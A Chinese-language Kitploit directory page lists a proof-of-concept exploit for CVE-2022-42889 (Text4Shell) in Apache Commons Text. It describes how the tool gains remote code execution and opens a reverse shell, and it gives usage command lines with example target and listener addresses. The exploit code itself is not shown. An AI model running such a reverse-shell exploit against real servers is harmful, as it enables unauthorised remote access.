Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-42889-text4shell — 针对 CVE-2022-42889 (Text4Shell) 的概念验证 (PoC),适用于 Apache Commons Text 1.10.0 之前的版本。该脚本通过脚本插值自动化远程代码执行 (RCE),以建立反向 Shell。此版本基于 Exploit-DB(ID:52261)中的原始漏洞利用,进行了结构化优化。 | Kitploit
工具/GitHubGitHub/goultarde/cve-2022-42889-text4shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubgoultarde/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

针对 CVE-2022-42889 (Text4Shell) 的概念验证 (PoC),适用于 Apache Commons Text 1.10.0 之前的版本。该脚本通过脚本插值自动化远程代码执行 (RCE),以建立反向 Shell。此版本基于 Exploit-DB(ID:52261)中的原始漏洞利用,进行了结构化优化。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1个月前尚未审核

CVE-2022-42889-text4shell

描述

此脚本是一个渗透测试工具,旨在利用 Apache Commons Text(版本 < 1.10.0)中的 CVE-2022-42889 漏洞,该漏洞也被称为 Text4Shell。它自动化传递基于 Java 的载荷以触发反向 Shell。

此实现基于公开漏洞利用程序:https://www.exploit-db.com/exploits/52261

功能

  • 使用 argparse 处理命令行参数,提高可用性。
  • 为 Java 载荷兼容性进行精确的 URL 编码。
  • 可自定义路径和易受攻击参数目标。

用法

前提条件

该脚本需要 Python 3 和 requests 库。

root@kitploit:~
pip install requests

语法

root@kitploit:~
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT

示例

root@kitploit:~
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139

免责声明

此工具仅用于教育目的和经过授权的渗透测试。作者不对因使用此脚本而导致的任何滥用或损害负责。

下载工具